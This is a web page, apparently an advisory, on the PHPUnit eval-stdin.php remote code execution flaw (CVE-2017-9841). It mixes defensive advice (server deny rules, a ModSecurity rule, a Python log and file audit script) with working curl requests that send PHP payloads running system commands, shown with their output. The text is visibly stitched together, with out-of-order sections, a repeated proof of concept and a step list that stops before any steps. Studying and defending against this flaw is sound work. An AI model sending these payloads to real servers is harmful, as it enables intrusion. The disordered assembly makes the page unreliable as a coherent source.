Eval-stdin.php Exploit - Vendor Phpunit Phpunit Src Util Php
The path vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php refers to CVE-2017-9841, a critical Remote Code Execution (RCE) vulnerability in the PHPUnit testing framework. Although discovered in 2017, it remains a frequent target for automated scanners and malware such as Androxgh0st because the file is often accidentally left in production environments.
Vulnerability Mechanism
The flaw lies in how the eval-stdin.php script handles input: it reads the raw request body (php://input) and passes it to eval(), so any PHP sent in a POST body is executed by the web server (see the NVD entry for CVE-2017-9841).
3. Exploitation Steps
Prerequisites:
- The target server is running a vulnerable version of PHPUnit.
- The vendor/ directory is accessible via the web.
The Attack Vector: Attackers scan the internet (or specific targets) looking for the specific path of this file. Once found, they send a POST request containing the payload.
Proof of Concept (PoC):
Using curl, an attacker can verify the vulnerability by sending a trivial PHP payload and checking whether its output appears in the response:
curl -X POST http://target-site.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
-d "<?php echo 'VULNERABLE'; ?>"
If the response contains "VULNERABLE", the server executed the request body and the target is vulnerable.
Remote Code Execution (RCE):
To achieve a reverse shell or system command execution:
curl -X POST http://target-site.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
-d "<?php system('id'); ?>"
Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Automated Exploitation:
This vulnerability is included in the Metasploit Framework (exploit/multi/http/phpunit_eval_stdin), making exploitation trivial for unskilled attackers.
4.3 Directory Structure
Best practices dictate that the vendor directory should be stored outside the web-accessible root (e.g., one level above public_html). The application should bootstrap from the public folder while keeping dependencies private.
A note on "False Positives"
Sometimes, a 200 OK response comes from a custom error handler or a dummy file rather than from PHPUnit. To confirm, send a benign arithmetic expression:
curl -X POST https://target.com/eval-stdin.php -d "<?php echo 5*5; ?>"
If the response contains 25, the request body was evaluated as PHP and the host is vulnerable.
Long-term Prevention
- Never deploy development dependencies to production. Use Composer with the --no-dev flag:
  composer install --no-dev --optimize-autoloader
- Block direct access to vendor/ via web server configuration.
  Apache (server or virtual-host configuration; a <Directory> block is not permitted inside .htaccess, where a bare "Require all denied" placed in vendor/.htaccess has the same effect):
  <Directory "vendor">
      Require all denied
  </Directory>
  Nginx:
  location ~ /vendor/ { deny all; return 403; }
- Set your DocumentRoot to the /public subdirectory (as many modern frameworks do). This prevents navigating up into vendor/.
- Use a Web Application Firewall (WAF) with rules to block eval-stdin.php and php://input abuse. Example ModSecurity rule:
  SecRule REQUEST_URI "eval-stdin\.php" "id:10001,deny,status:403,msg:'PHPUnit RCE attempt'"
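As an added defensive example (not part of the original page), the Python script below applies the same URI match as the ModSecurity rule to web-server access logs, separates probes that were answered 200 on a POST from those that were blocked or hit nothing, and audits a document root for a leftover eval-stdin.php. The log lines and the demo document root it builds are constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# Same pattern the ModSecurity rule above applies to REQUEST_URI.
EVAL_STDIN_RE = re.compile(r"eval-stdin\.php", re.IGNORECASE)

# Combined log format: ip ident user [timestamp] "METHOD URI PROTO" status size ...
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (not real traffic): a probe answered 200, a normal request, a probe answered 404.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 48 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:12:00:03 +0000] "POST /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 162 "-" "curl/8.0"
"""

def find_eval_stdin_hits(log_text):
    """Return (ip, method, uri, status) for every request whose URI names eval-stdin.php."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_LOG_RE.match(line)
        if m and EVAL_STDIN_RE.search(m["uri"]):
            hits.append((m["ip"], m["method"], m["uri"], int(m["status"])))
    return hits

def likely_executed(hits):
    """A POST answered 200 means the script ran the body; 403/404 means blocked or absent."""
    return [h for h in hits if h[1] == "POST" and h[3] == 200]

def exposed_eval_stdin(docroot):
    """Host-side audit: any eval-stdin.php below the document root is reachable over HTTP."""
    return sorted(p.relative_to(docroot).as_posix() for p in Path(docroot).rglob("eval-stdin.php"))

def make_demo_docroot():
    """Throwaway document root with a leftover PHPUnit tree (constructed for this demo)."""
    root = Path(tempfile.mkdtemp())
    target = root / "vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
    target.parent.mkdir(parents=True)
    target.write_text("<?php // placeholder standing in for the real script\n")
    return root

if __name__ == "__main__":
    for hit in likely_executed(find_eval_stdin_hits(SAMPLE_LOG)):
        print("probable code execution:", hit)
    print("exposed under docroot:", exposed_eval_stdin(make_demo_docroot()))
```

Run the audit against the real DocumentRoot after each deploy; an empty list from exposed_eval_stdin is the state the --no-dev and DocumentRoot advice above should leave you in.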
The Weaponization Process
An attacker would typically follow these steps:
Impact and risk factors
- Severity: critical (unauthenticated RCE).
- Impact depends on webserver privileges: from site defacement to full system compromise and lateral movement.
- High exploitability: simple HTTP requests suffice when the file is present.
- Persistent consequences: backdoors, credential theft, database compromise, long-term footholds.
3.2 Proof of Concept (PoC)
An attacker can utilize curl to execute arbitrary system commands. The following payload sends a system command to the server and expects the output in the response.
Request:
curl -X POST http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
-d "<?php echo shell_exec('id'); ?>"
Response:
If successful, the server will execute the id command and return the output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)